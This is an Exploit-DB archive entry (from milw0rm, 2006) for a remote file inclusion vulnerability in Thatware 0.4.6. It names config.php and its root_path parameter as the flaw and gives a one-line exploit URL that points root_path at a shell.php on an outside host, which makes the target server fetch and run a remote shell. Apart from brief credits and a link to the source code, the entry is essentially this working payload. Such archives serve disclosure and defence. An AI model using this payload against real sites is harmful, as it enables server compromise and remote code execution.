Thatware <= 0.4.6 root_path Remote File Include Vulnerability

2006-08-10T00:00:00
ID EDB-ID:2166
Type exploitdb
Reporter Drago84
Modified 2006-08-10T00:00:00

Description

Thatware <= 0.4.6 (root_path) Remote File Include Vulnerability. CVE-2002-2298,CVE-2006-4213. Webapps exploit for php platform

                                        
                                            Thatware  0.4.6 (root_path) Remote File Inclusion

CreW: ToXiC

Bug Found by Drago84

Source Code:
http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware_0.4.6.tar.gz

Page Affect
config.php

ExP:
http://www.sito.com/dir_thatware/config.php?root_path=http://www.evalsite.com/shell.php'

Greatz: str0ke

# milw0rm.com [2006-08-10]